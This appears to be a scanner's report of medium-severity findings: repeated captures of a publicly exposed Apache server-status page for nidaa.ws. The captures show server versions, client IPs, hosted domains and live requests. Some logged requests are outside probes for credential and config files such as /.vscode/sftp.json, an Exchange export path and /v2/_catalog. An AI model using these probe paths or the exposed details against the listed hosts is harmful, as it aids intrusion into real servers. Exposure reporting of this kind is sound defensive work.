      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      SrvPIDAccMCPU
      SSReqDurConnChildSlotClientProtocolVHostRequest
      
      0-8164280/10/6261_
      1.99227548070640.04.81791.16
      162.158.129.197http/1.1qr.brunch.ws:443GET /storage/food_image/17088499495311_img5d0fa3d62169406cac3fd
      
      0-8164280/14/5337_
      2.145812123339540.01.41790.44
      162.158.59.152http/1.1sibaqulhorof.com:443POST /api/v1/app/auth/info HTTP/1.1
      
      0-8164281/18/5633K
      2.210126521930.80.09714.25
      162.158.95.25http/1.1nidaa.ws:80GET /.vscode/sftp.json HTTP/1.1
      
      0-8164280/11/5576_
      2.002276361366340.00.68728.70
      162.158.129.202http/1.1qr.brunch.ws:443GET /storage/food_image/17096770987078_minibeefburger.webp HTTP
      
      0-8164280/10/5728_
      2.0022612254824300.015.04834.28
      162.158.59.154http/1.1sibaqulhorof.com:443POST /api/v1/app/question/get/single HTTP/1.1
      
      0-8164280/11/5398_
      2.081637946749830.00.28984.87
      172.70.158.148http/1.1sibaqulhorof.com:443GET /api/v1/app/general/maintenance_check HTTP/1.1
      
      0-8164280/15/5543_
      2.2111545256190.00.85754.52
      172.71.114.155http/1.1qr.brunch.ws:443GET /assets/fonts/rb.ttf HTTP/1.1
      
      0-8164280/10/5493_
      2.03221438477180.00.05893.03
      162.158.130.37http/1.1qr.brunch.ws:443GET /storage/food_image/17162860567415_americancoffee.jpg HTTP/
      
      0-8164280/15/6212_
      2.164213144450190.00.84935.56
      172.69.238.136http/1.1sibaqulhorof.com:443POST /api/v1/app/game/start HTTP/1.1
      
      0-8164280/7/5517R
      1.97230243848130.00.25929.70
      51.36.181.230http/1.1
      
      0-8164281/9/5566K
      2.2101237482990.90.92712.65
      172.68.195.167http/1.1nidaa.ws:80GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor
      
      0-8164280/9/6226_
      2.02224540156680.01.11578.00
      162.158.129.48http/1.1qr.brunch.ws:443GET /storage/food_image/17162858218837_lemonwithmintcocktail.jp
      
      0-8164280/17/5691_
      2.071879545829900.00.711089.97
      172.69.238.136http/1.1sibaqulhorof.com:443POST /api/v1/app/game/use/help HTTP/1.1
      
      0-8164280/19/5560_
      2.1110641746641200.00.24935.94
      114.119.153.122http/1.1daris.live:80GET /product/9 HTTP/1.1
      
      0-8164280/12/5720W
      1.80224071289950.00.70748.68
      185.220.170.9http/1.1sulaimaniya.edu.sa:443GET /download/78/%D8%A7%D9%84%D8%B5%D9%81-%D8%A7%D9%84%D8%A3%D9
      
      0-8164280/11/5574_
      2.193318927168500.00.21785.37
      31.167.155.229http/1.1jawad.com.sa:443GET /storage/app/public/uploads/products/7XbzcqLjpmlOOYOfIRlrXv
      
      0-8164280/12/5453_
      2.0717410232210570.025.78899.95
      162.158.59.152http/1.1sibaqulhorof.com:443POST /api/v1/app/auth/avatar/update HTTP/1.1
      
      0-8164280/13/5606_
      2.01224270287840.00.14883.28
      162.158.129.186http/1.1qr.brunch.ws:443GET /storage/food_image/17096786919732_orange.webp HTTP/1.1
      
      0-8164280/11/5781_
      2.11979329923870.00.52856.45
      162.158.59.153http/1.1sibaqulhorof.com:443GET /api/v1/app/general/game_version HTTP/1.1
      
      0-8164280/10/5773R
      1.96230239930810.051.79777.33
      51.223.122.144http/1.1
      
      0-8164280/14/5447_
      1.982301204003470.00.33714.12
      162.158.129.179http/1.1qr.brunch.ws:443GET /storage/food_image/17088571791773_img22d8f50a73dd4253ba14a
      
      0-8164280/14/5685_
      2.071729544395210.00.15796.31
      172.69.238.147http/1.1sibaqulhorof.com:443POST /api/v1/app/auth/avatar/update HTTP/1.1
      
      0-8164280/8/5569W
      1.81222037440460.00.76950.13
      185.220.170.9http/1.1sulaimaniya.edu.sa:443GET /download/78/%D8%A7%D9%84%D8%B5%D9%81-%D8%A7%D9%84%D8%A3%D9
      
      0-8164280/8/5844_
      2.052191133691010.00.06704.75
      66.249.74.32http/1.1jawad.com.sa:443POST /api/v.1/front/visitor/count HTTP/1.1
      
      0-8164280/21/5758W
      1.91135036521600.00.61993.83
      138.201.201.48http/1.1sulaimaniya.edu.sa:443POST /wp-cron.php?doing_wp_cron=1717242669.23657298088073730468
      
      1-8113790/309/4988_
      37.90220564428210.069.071004.89
      162.158.129.28http/1.1qr.brunch.ws:443GET /storage/food_image/17162864712835_mocha.jpg HTTP/1.1
      
      1-8113790/253/5345_
      37.9217410254337980.071.38937.21
      162.158.59.152http/1.1sibaqulhorof.com:443GET /api/v1/app/general/maintenance_check HTTP/1.1
      
      1-8113790/329/5695_
      37.86226543780030.071.89923.51
      162.158.130.4http/1.1qr.brunch.ws:443GET /storage/food_image/17088535676493_imgf0c90dde8d8c46968d7b8
      
      1-8113790/243/5619_
      37.91218237813410.040.49739.73
      162.158.129.22http/1.1qr.brunch.ws:443GET /storage/food_image/17162870612779_sparklingwatersmall.jpg 
      
      1-8113790/273/5155_
      37.931639152032770.020.23878.20
      172.70.158.143http/1.1sibaqulhorof.com:443GET /api/v1/app/friends/requests HTTP/1.1
      
      1-8113790/293/5474_
      37.9412263718051887200.031.56774.57
      185.220.170.9http/1.1sulaimaniya.edu.sa:443GET /download/78/%D8%A7%D9%84%D8%B5%D9%81-%D8%A7%D9%84%D8%A3%D9
      
      1-8113790/221/5376_
      
      Found on 2024-06-01 11:53
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31d7a83140d7a831405b9ba149

      Apache Status
      
      Apache Server Status for www.nidaa.ws (via 138.201.201.48)
      
      Server Version: Apache/2.4.59 (cPanel) OpenSSL/1.1.1w mod_bwlimited/1.4 Phusion_Passenger/6.0.22
      Server MPM: worker
      Server Built: May 22 2024 00:34:08
      
      Current Time: Saturday, 01-Jun-2024 14:53:24 +03
      Restart Time: Thursday, 23-May-2024 04:04:49 +03
      Parent Server Config. Generation: 9
      Parent Server MPM Generation: 8
      Server uptime:  9 days 10 hours 48 minutes 34 seconds
      Server load: 0.45 0.42 0.42
      Total accesses: 1270180 - Total Traffic: 181.8 GB - Total Duration: 1402282855
      CPU Usage: u533.86 s44.72 cu5497.83 cs1237.95 - .896% CPU load
      1.56 requests/sec - 233.5 kB/second - 150.1 kB/request - 1104 ms/request
      30 requests currently being processed, 0 workers gracefully restarting, 195 idle workers
      __K______RK___W____R__W_W_____________________K__________W_____K
      ____K_________WR__________K_______K__K__R_____________W___R__WWW
      WWWWWWWWWWWWWWWWWWWWWW___K____________K__W________R_W________K__
      ________________W________KK________________R______K_______......
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ........
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      SrvPIDAccMCPU
      SSReqDurConnChildSlotClientProtocolVHostRequest
      
      0-8164280/10/6261_
      1.99227548070640.04.81791.16
      162.158.129.197http/1.1qr.brunch.ws:443GET /storage/food_image/17088499495311_img5d0fa3d62169406cac3fd
      
      0-8164280/14/5337_
      2.145812123339540.01.41790.44
      162.158.59.152http/1.1sibaqulhorof.com:443POST /api/v1/app/auth/info HTTP/1.1
      
      0-8164281/18/5633K
      2.210126521930.80.09714.25
      162.158.95.25http/1.1nidaa.ws:80GET /.vscode/sftp.json HTTP/1.1
      
      0-8164280/11/5576_
      2.002276361366340.00.68728.70
      162.158.129.202http/1.1qr.brunch.ws:443GET /storage/food_image/17096770987078_minibeefburger.webp HTTP
      
      0-8164280/10/5728_
      2.0022612254824300.015.04834.28
      162.158.59.154http/1.1sibaqulhorof.com:443POST /api/v1/app/question/get/single HTTP/1.1
      
      0-8164280/11/5398_
      2.081637946749830.00.28984.87
      172.70.158.148http/1.1sibaqulhorof.com:443GET /api/v1/app/general/maintenance_check HTTP/1.1
      
      0-8164280/15/5543_
      2.2111545256190.00.85754.52
      172.71.114.155http/1.1qr.brunch.ws:443GET /assets/fonts/rb.ttf HTTP/1.1
      
      0-8164280/10/5493_
      2.03221438477180.00.05893.03
      162.158.130.37http/1.1qr.brunch.ws:443GET /storage/food_image/17162860567415_americancoffee.jpg HTTP/
      
      0-8164280/15/6212_
      2.164213144450190.00.84935.56
      172.69.238.136http/1.1sibaqulhorof.com:443POST /api/v1/app/game/start HTTP/1.1
      
      0-8164280/7/5517R
      1.97230243848130.00.25929.70
      51.36.181.230http/1.1
      
      0-8164281/9/5566K
      2.2101237482990.90.92712.65
      172.68.195.167http/1.1nidaa.ws:80GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor
      
      0-8164280/9/6226_
      2.02224540156680.01.11578.00
      162.158.129.48http/1.1qr.brunch.ws:443GET /storage/food_image/17162858218837_lemonwithmintcocktail.jp
      
      0-8164280/17/5691_
      2.071879545829900.00.711089.97
      172.69.238.136http/1.1sibaqulhorof.com:443POST /api/v1/app/game/use/help HTTP/1.1
      
      0-8164280/19/5560_
      2.1110641746641200.00.24935.94
      114.119.153.122http/1.1daris.live:80GET /product/9 HTTP/1.1
      
      0-8164280/12/5720W
      1.80224071289950.00.70748.68
      185.220.170.9http/1.1sulaimaniya.edu.sa:443GET /download/78/%D8%A7%D9%84%D8%B5%D9%81-%D8%A7%D9%84%D8%A3%D9
      
      0-8164280/11/5574_
      2.193318927168500.00.21785.37
      31.167.155.229http/1.1jawad.com.sa:443GET /storage/app/public/uploads/products/7XbzcqLjpmlOOYOfIRlrXv
      
      0-8164280/12/5453_
      2.0717410232210570.025.78899.95
      162.158.59.152http/1.1sibaqulhorof.com:443POST /api/v1/app/auth/avatar/update HTTP/1.1
      
      0-8164280/13/5606_
      2.01224270287840.00.14883.28
      162.158.129.186http/1.1qr.brunch.ws:443GET /storage/food_image/17096786919732_orange.webp HTTP/1.1
      
      0-8164280/11/5781_
      2.11969329923870.00.52856.45
      162.158.59.153http/1.1sibaqulhorof.com:443GET /api/v1/app/general/game_version HTTP/1.1
      
      0-8164280/10/5773R
      1.96230239930810.051.79777.33
      51.223.122.144http/1.1
      
      0-8164280/14/5447_
      1.982301204003470.00.33714.12
      162.158.129.179http/1.1qr.brunch.ws:443GET /storage/food_image/17088571791773_img22d8f50a73dd4253ba14a
      
      0-8164280/14/5685_
      2.071729544395210.00.15796.31
      172.69.238.147http/1.1sibaqulhorof.com:443POST /api/v1/app/auth/avatar/update HTTP/1.1
      
      0-8164280/8/5569W
      1.81222037440460.00.76950.13
      185.220.170.9http/1.1sulaimaniya.edu.sa:443GET /download/78/%D8%A7%D9%84%D8%B5%D9%81-%D8%A7%D9%84%D8%A3%D9
      
      0-8164280/8/5844_
      2.052181133691010.00.06704.75
      66.249.74.32http/1.1jawad.com.sa:443POST /api/v.1/front/visitor/count HTTP/1.1
      
      0-8164280/21/5758W
      1.91135036521600.00.61993.83
      138.201.201.48http/1.1sulaimaniya.edu.sa:443POST /wp-cron.php?doing_wp_cron=1717242669.23657298088073730468
      
      1-8113790/309/4988_
      37.90220564428210.069.071004.89
      162.158.129.28http/1.1qr.brunch.ws:443GET /storage/food_image/17162864712835_mocha.jpg HTTP/1.1
      
      1-8113790/253/5345_
      37.9217410254337980.071.38937.21
      162.158.59.152http/1.1sibaqulhorof.com:443GET /api/v1/app/general/maintenance_check HTTP/1.1
      
      1-8113790/329/5695_
      37.86226543780030.071.89923.51
      162.158.130.4http/1.1qr.brunch.ws:443GET /storage/food_image/17088535676493_imgf0c90dde8d8c46968d7b8
      
      1-8113790/243/5619_
      37.91218237813410.040.49739.73
      162.158.129.22http/1.1qr.brunch.ws:443GET /storage/food_image/17162870612779_sparklingwatersmall.jpg 
      
      1-8113790/273/5155_
      37.931629152032770.020.23878.20
      172.70.158.143http/1.1sibaqulhorof.com:443GET /api/v1/app/friends/requests HTTP/1.1
      
      1-8113790/293/5474_
      37.9412263718051887200.031.56774.57
      185.220.170.9http/1.1sulaimaniya.edu.sa:443GET /download/78/%D8%A7%D9%84%D8%B5%D9%81-%D8%A7%D9%84%D8%A3%D9
      
      1-8113790/221/5376_
      
      Found on 2024-06-01 11:53
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31d7a83140d7a831401be6ffed

      Apache Status
      
      Apache Server Status for www.nidaa.ws (via 138.201.201.48)
      
      Server Version: Apache/2.4.59 (cPanel) OpenSSL/1.1.1w mod_bwlimited/1.4 Phusion_Passenger/6.0.22
      Server MPM: worker
      Server Built: May 22 2024 00:34:08
      
      Current Time: Thursday, 30-May-2024 14:25:18 +03
      Restart Time: Thursday, 23-May-2024 04:04:49 +03
      Parent Server Config. Generation: 7
      Parent Server MPM Generation: 6
      Server uptime:  7 days 10 hours 20 minutes 28 seconds
      Server load: 0.03 0.09 0.13
      Total accesses: 1022101 - Total Traffic: 146.0 GB - Total Duration: 1113483358
      CPU Usage: u628.22 s80.57 cu4224 cs945.69 - .916% CPU load
      1.59 requests/sec - 238.5 kB/second - 149.8 kB/request - 1089.41 ms/request
      26 requests currently being processed, 0 workers gracefully restarting, 174 idle workers
      __________W___K_____K_______K_K___________________K_K_____W__K__
      ___________.........................______________K_KK_______WWW
      WWWWWWWWWWWWWWWWWWWWWW___K_K___K______K________.................
      ........K_________K___K___K______________K_K__K_________________
      __________K_K_K____.............................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ........
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      SrvPIDAccMCPU
      SSReqDurConnChildSlotClientProtocolVHostRequest
      
      0-6131530/447/5050_
      50.04123734824540.028.66652.49
      52.230.152.141http/1.1garndhabi.org:80GET /login HTTP/1.1
      
      0-6131530/329/4312_
      49.99361618793360.015.66550.98
      52.230.152.141http/1.1garndhabi.org:80GET /admin/dashboard HTTP/1.1
      
      0-6131530/388/4725_
      49.99343521765270.015.79637.51
      52.230.152.141http/1.1garndhabi.org:80GET /admin/dashboard HTTP/1.1
      
      0-6131530/337/4485_
      49.984216350949790.039.57582.75
      52.230.152.141http/1.1garndhabi.org:80GET /admin/dashboard HTTP/1.1
      
      0-6131530/375/4607_
      50.0483645057550.026.34736.27
      52.230.152.141http/1.1garndhabi.org:80GET /login HTTP/1.1
      
      0-6131530/386/4399_
      49.99401638137930.0120.08785.51
      52.230.152.141http/1.1garndhabi.org:80GET /admin/dashboard HTTP/1.1
      
      0-6131530/377/4584_
      50.00321634431170.020.53581.23
      52.230.152.141http/1.1garndhabi.org:80GET /up//upload//webarch/js/assets/plugins/jquery-unveil/webarc
      
      0-6131530/395/4350_
      49.99381826689990.078.21704.69
      52.230.152.141http/1.1garndhabi.org:80GET /admin/dashboard HTTP/1.1
      
      0-6131530/357/5019_
      50.0521737497400.062.38778.08
      52.230.152.141http/1.1garndhabi.org:80GET /admin/dashboard HTTP/1.1
      
      0-6131530/339/4471_
      50.00272629955050.036.66811.75
      52.230.152.141http/1.1garndhabi.org:80GET /up//upload//webarch/js/assets/plugins/jquery-unveil/assets
      
      0-6131530/375/4201W
      49.79700226357850.055.64558.42
      66.118.180.55http/1.1albayan.edu.sa:443GET /imgweb/file44/11111%20(3).pdf HTTP/1.1
      
      0-6131530/398/5076_
      50.02203525376360.016.40442.60
      52.230.152.141http/1.1garndhabi.org:80GET /404 HTTP/1.1
      
      0-6131530/360/4522_
      50.049337553360.044.56952.54
      85.195.135.76http/1.1albayan.edu.sa:443GET /e_sch/source/inettuts.css HTTP/1.1
      
      0-6131530/390/4607_
      50.04101328892640.042.90810.57
      52.230.152.141http/1.1garndhabi.org:80GET /login HTTP/1.1
      
      0-6131531/357/4701K
      50.070136522150.813.37586.52
      162.158.111.85http/1.1nidaa.ws:80GET /v2/_catalog HTTP/1.1
      
      0-6131530/384/4425_
      50.02211721587230.025.82650.22
      52.230.152.141http/1.1garndhabi.org:80GET /admin/dashboard HTTP/1.1
      
      0-6131530/422/4380_
      50.00303224699480.057.28768.96
      52.230.152.141http/1.1garndhabi.org:80GET /up//upload//webarch/js/assets/plugins/jquery-unveil/webarc
      
      0-6131530/371/4573_
      50.01253349082300.078.07711.18
      52.230.152.141http/1.1garndhabi.org:80GET /login HTTP/1.1
      
      0-6131530/375/4795_
      50.02231823394670.011.25695.13
      52.230.152.141http/1.1garndhabi.org:80GET /login HTTP/1.1
      
      0-6131530/351/4565_
      50.0563632443900.085.64633.71
      52.230.152.141http/1.1garndhabi.org:80GET /login HTTP/1.1
      
      0-6131531/375/4384K
      50.0701200457140.9129.04637.92
      172.70.251.25http/1.1nidaa.ws:80GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor
      
      0-6131530/450/4664_
      50.0543722625030.014.22631.30
      52.230.152.141http/1.1garndhabi.org:80GET /login HTTP/1.1
      
      0-6131530/628/4721_
      50.0601628473860.068.45730.22
      52.230.152.141http/1.1garndhabi.org:80GET /login HTTP/1.1
      
      0-6131530/415/4748_
      50.02183528145900.067.59625.04
      52.230.152.141http/1.1garndhabi.org:80GET /404 HTTP/1.1
      
      0-6131530/412/4688_
      50.03151624704430.0103.07806.24
      52.230.152.141http/1.1garndhabi.org:80GET /up//upload//webarch/js/assets/plugins/jquery-unveil/assets
      
      1-6135160/376/4037_
      46.90321841931980.019.55777.44
      52.230.152.141http/1.1garndhabi.org:80GET /login HTTP/1.1
      
      1-6135160/407/4385_
      46.94121740877620.010.31675.98
      52.230.152.141http/1.1garndhabi.org:80GET /admin/dashboard HTTP/1.1
      
      1-6135160/354/4583_
      46.88423635901850.042.45722.12
      52.230.152.141http/1.1garndhabi.org:80GET /404 HTTP/1.1
      
      1-6135161/368/4476K
      46.970131503070.821.31631.89
      162.158.87.19http/1.1nidaa.ws:80GET /.DS_Store HTTP/1.1
      
      1-6135160/335/4274_
      46.89381732162870.0113.01677.88
      52.230.152.141http/1.1garndhabi.org:80GET /404 HTTP/1.1
      
      1-6135161/322/4162K
      46.970126738480.899.05613.80
      172.70.246.210http/1.1nidaa.ws:80GET /v2/_catalog HTTP/1.1
      
      1-6135160/387/4386_
      46.9631753554790.020.01679.45
      52.230.152.141http/1.1garndhabi.org:80GET /404 HTTP/1.1
      
      1-6135160/374/4353_
      46.91283735011250.040.03591.90
      52.230.152.141http/1.1garndhabi.org:80GET /login HTTP/1.1
      
      1-6135160/400/4105_
      46.93</
      Found on 2024-05-30 11:25
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31d7a83140d7a83140b09278a8

      Apache Status
      
      Apache Server Status for www.nidaa.ws (via 138.201.201.48)
      
      Server Version: Apache/2.4.59 (cPanel) OpenSSL/1.1.1w mod_bwlimited/1.4 Phusion_Passenger/6.0.22
      Server MPM: worker
      Server Built: May 22 2024 00:34:08
      
      Current Time: Thursday, 30-May-2024 14:25:18 +03
      Restart Time: Thursday, 23-May-2024 04:04:49 +03
      Parent Server Config. Generation: 7
      Parent Server MPM Generation: 6
      Server uptime:  7 days 10 hours 20 minutes 28 seconds
      Server load: 0.03 0.09 0.13
      Total accesses: 1022089 - Total Traffic: 146.0 GB - Total Duration: 1113483213
      CPU Usage: u628.15 s80.56 cu4224 cs945.69 - .916% CPU load
      1.59 requests/sec - 238.5 kB/second - 149.8 kB/request - 1089.42 ms/request
      14 requests currently being processed, 0 workers gracefully restarting, 186 idle workers
      __________W_________K_________K___________________K__________K__
      ___________.........................______________K__K_______WWW
      WWWWWWWWWWWWWWWWWWWWWW___K_K___________________.................
      ........__________K_______K________________K____________________
      ____________W_K____.............................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ........
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      SrvPIDAccMCPU
      SSReqDurConnChildSlotClientProtocolVHostRequest
      
      0-6131530/447/5050_
      50.04123734824540.028.66652.49
      52.230.152.141http/1.1garndhabi.org:80GET /login HTTP/1.1
      
      0-6131530/329/4312_
      49.99351618793360.015.66550.98
      52.230.152.141http/1.1garndhabi.org:80GET /admin/dashboard HTTP/1.1
      
      0-6131530/388/4725_
      49.99333521765270.015.79637.51
      52.230.152.141http/1.1garndhabi.org:80GET /admin/dashboard HTTP/1.1
      
      0-6131530/337/4485_
      49.984116350949790.039.57582.75
      52.230.152.141http/1.1garndhabi.org:80GET /admin/dashboard HTTP/1.1
      
      0-6131530/375/4607_
      50.0483645057550.026.34736.27
      52.230.152.141http/1.1garndhabi.org:80GET /login HTTP/1.1
      
      0-6131530/386/4399_
      49.99391638137930.0120.08785.51
      52.230.152.141http/1.1garndhabi.org:80GET /admin/dashboard HTTP/1.1
      
      0-6131530/377/4584_
      50.00321634431170.020.53581.23
      52.230.152.141http/1.1garndhabi.org:80GET /up//upload//webarch/js/assets/plugins/jquery-unveil/webarc
      
      0-6131530/395/4350_
      49.99371826689990.078.21704.69
      52.230.152.141http/1.1garndhabi.org:80GET /admin/dashboard HTTP/1.1
      
      0-6131530/357/5019_
      50.0521737497400.062.38778.08
      52.230.152.141http/1.1garndhabi.org:80GET /admin/dashboard HTTP/1.1
      
      0-6131530/339/4471_
      50.00272629955050.036.66811.75
      52.230.152.141http/1.1garndhabi.org:80GET /up//upload//webarch/js/assets/plugins/jquery-unveil/assets
      
      0-6131530/375/4201W
      49.79700226357850.055.64558.42
      66.118.180.55http/1.1albayan.edu.sa:443GET /imgweb/file44/11111%20(3).pdf HTTP/1.1
      
      0-6131530/398/5076_
      50.02193525376360.016.40442.60
      52.230.152.141http/1.1garndhabi.org:80GET /404 HTTP/1.1
      
      0-6131530/360/4522_
      50.049337553360.044.56952.54
      85.195.135.76http/1.1albayan.edu.sa:443GET /e_sch/source/inettuts.css HTTP/1.1
      
      0-6131530/390/4607_
      50.04101328892640.042.90810.57
      52.230.152.141http/1.1garndhabi.org:80GET /login HTTP/1.1
      
      0-6131530/356/4700_
      49.98443236522120.013.37586.52
      52.230.152.141http/1.1garndhabi.org:80GET /login HTTP/1.1
      
      0-6131530/384/4425_
      50.02211721587230.025.82650.22
      52.230.152.141http/1.1garndhabi.org:80GET /admin/dashboard HTTP/1.1
      
      0-6131530/422/4380_
      50.00303224699480.057.28768.96
      52.230.152.141http/1.1garndhabi.org:80GET /up//upload//webarch/js/assets/plugins/jquery-unveil/webarc
      
      0-6131530/371/4573_
      50.01253349082300.078.07711.18
      52.230.152.141http/1.1garndhabi.org:80GET /login HTTP/1.1
      
      0-6131530/375/4795_
      50.02231823394670.011.25695.13
      52.230.152.141http/1.1garndhabi.org:80GET /login HTTP/1.1
      
      0-6131530/351/4565_
      50.0563632443900.085.64633.71
      52.230.152.141http/1.1garndhabi.org:80GET /login HTTP/1.1
      
      0-6131531/375/4384K
      50.0701200457140.9129.04637.92
      172.70.251.25http/1.1nidaa.ws:80GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor
      
      0-6131530/450/4664_
      50.0543722625030.014.22631.30
      52.230.152.141http/1.1garndhabi.org:80GET /login HTTP/1.1
      
      0-6131530/628/4721_
      50.0601628473860.068.45730.22
      52.230.152.141http/1.1garndhabi.org:80GET /login HTTP/1.1
      
      0-6131530/415/4748_
      50.02173528145900.067.59625.04
      52.230.152.141http/1.1garndhabi.org:80GET /404 HTTP/1.1
      
      0-6131530/412/4688_
      50.03151624704430.0103.07806.24
      52.230.152.141http/1.1garndhabi.org:80GET /up//upload//webarch/js/assets/plugins/jquery-unveil/assets
      
      1-6135160/376/4037_
      46.90321841931980.019.55777.44
      52.230.152.141http/1.1garndhabi.org:80GET /login HTTP/1.1
      
      1-6135160/407/4385_
      46.94121740877620.010.31675.98
      52.230.152.141http/1.1garndhabi.org:80GET /admin/dashboard HTTP/1.1
      
      1-6135160/354/4583_
      46.88413635901850.042.45722.12
      52.230.152.141http/1.1garndhabi.org:80GET /404 HTTP/1.1
      
      1-6135160/367/4475_
      46.87461631503040.021.31631.89
      52.230.152.141http/1.1garndhabi.org:80GET /admin/dashboard HTTP/1.1
      
      1-6135160/335/4274_
      46.89371732162870.0113.01677.88
      52.230.152.141http/1.1garndhabi.org:80GET /404 HTTP/1.1
      
      1-6135161/322/4162K
      46.970126738480.899.05613.80
      172.70.246.210http/1.1nidaa.ws:80GET /v2/_catalog HTTP/1.1
      
      1-6135160/387/4386_
      46.9621753554790.020.01679.45
      52.230.152.141http/1.1garndhabi.org:80GET /404 HTTP/1.1
      
      1-6135160/374/4353_
      46.91283735011250.040.03591.90
      52.230.152.141http/1.1garndhabi.org:80GET /login HTTP/1.1
      
      1-6135160/400/4105_
      46.93<
      Found on 2024-05-30 11:25
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31d7a83140d7a83140d47dd90b

      Apache Status
      
      Apache Server Status for www.nidaa.ws (via 138.201.201.48)
      
      Server Version: Apache/2.4.59 (cPanel) OpenSSL/1.1.1w mod_bwlimited/1.4 Phusion_Passenger/6.0.22
      Server MPM: worker
      Server Built: May 22 2024 00:34:08
      
      Current Time: Wednesday, 29-May-2024 14:24:21 +03
      Restart Time: Thursday, 23-May-2024 04:04:49 +03
      Parent Server Config. Generation: 6
      Parent Server MPM Generation: 5
      Server uptime:  6 days 10 hours 19 minutes 31 seconds
      Server load: 0.04 0.05 0.08
      Total accesses: 869409 - Total Traffic: 126.0 GB - Total Duration: 967128770
      CPU Usage: u700.36 s104.38 cu3408.14 cs744.57 - .892% CPU load
      1.56 requests/sec - 237.8 kB/second - 152.0 kB/request - 1112.4 ms/request
      24 requests currently being processed, 0 workers gracefully restarting, 226 idle workers
      K__________________K___________K______________W_K_____KK________
      __________________________________K________________K_________WWW
      WWWWWWWWWWWWWWWWWWWWWW____K__K______K__________K__K__R__________
      _K_______________KK_________________K________________K_K_______K
      ______K_________K__.............................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
